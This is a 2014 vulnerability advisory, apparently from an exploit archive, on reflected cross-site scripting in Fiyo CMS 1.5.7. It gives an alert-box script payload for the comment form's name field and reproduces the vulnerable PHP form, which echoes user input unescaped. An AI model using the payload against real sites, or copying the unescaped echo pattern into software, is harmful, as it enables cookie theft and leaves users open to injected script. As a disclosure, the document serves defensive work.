Home / exploitsPDF  

Fiyo CMS 1.5.7 Cross Site Scripting

Posted on 30 May 2014

# Exploit Title: Fiyo CMS 1.5.7 XSS Vulnerability # Date: 05/29/2014 # Author: Mustafa ALTINKAYNAK # Download URL :http://www.fiyo.org/ # Software Link: http://www.fiyo.org/download # Vuln Category: CWE-79 (XSS) # Tested on: Fiyo CMS 1.5.7 # Tested Local Platform : XAMP on Windows # Patch/ Fix: Not published. --------------------------- Technical Details --------------------------- Reflected XSS : Review form can be bypassed. Users can be played cookies. Example : Nama : "><script>alert("test");</script> --------------------------------------------------------------------------------- Form Comment (XSS Vuln) # /apps/app_comment/form_comment.php <?php /** * @name Comment * @version 1.5.0 * @package Fiyo CMS * @copyright Copyright (C) 2012 Fiyo CMS. * @license GNU/GPL, see LICENSE.txt * @description **/ defined('_FINDEX_') or die('Access Denied'); ?> <script> function reloadCaptcha() { document.getElementById('captcha').src = document.getElementById('captcha').src+ '?' +new Date(); } </script> <h3 id="comments" ><?php echo comment_Leave_Comment; ?></h3> <?php echo @$notice; ?> <form method="post" action="#comments" class="form-comment"> <div><label><span><?php echo comment_Name; ?> *</span><div> <input type='text' name='name' style='width:60%; max-width : 200px;' value ="<?php echo @$name; ?>" <?php if(!empty($name)) echo "readonly"; ?> class="input required" placeholder="Name" required></label></div> </div> <div><label><span><?php echo comment_Email; ?> *</span><div> <input class="input required email" style='width:60%; max-width : 200px;' type='email' name='email' value ="<?php echo @$email; ?>" <?php if(!empty($email)) echo "readonly"; ?> placeholder="name@email.com" required></label></div> </div> <div><label><span><?php echo comment_Website; ?> </span><div> <input type="url" class="input" style="width:60%; max-width : 200px;" name="web" value="<?php echo @$_POST['web']; ?>" placeholder="http://" /></label></div> </div> <div><label><span><?php echo comment_Comment; ?> *</span><div> <textarea class="input required" name='com' style='width:100%; max-width : 500px;' rows="8" required><?php echo @$_POST['com']; ?></textarea></label></div> </div> <?php if(empty($privatekey) or empty($publickey )) : ?> <div><span><?php echo comment_Security_Code; ?> * </span> <div><img src="<?php echo FUrl; ?>/plugins/plg_mathcaptcha/image.php" alt="Click to reload image" title="Click to reload image" id="captcha" onclick="javascript:reloadCaptcha()" class="captcha-image" /></div><input type="text" name="secure" placeholder="What's the result?" onclick="this.value=''" class="input required numeric" required /></div> <?php else : ?> <div> <span>ReCaptcha *</span> <div> <script type="text/javascript"> var RecaptchaOptions = { theme : 'clean' }; </script> <?php echo recaptcha_get_html($publickey);?> </div> </div> <?php endif; ?> <div style="overflow: visible;"> <input type='submit' name='send-comment' class='comment-button button btn' value="Send"> </div> </form> ----------- Mustafa ALTINKAYNAK twitter : @m_altinkaynak <http://twitter.com/m_altinkaynak> www.mustafaaltinkaynak.com

 

TOP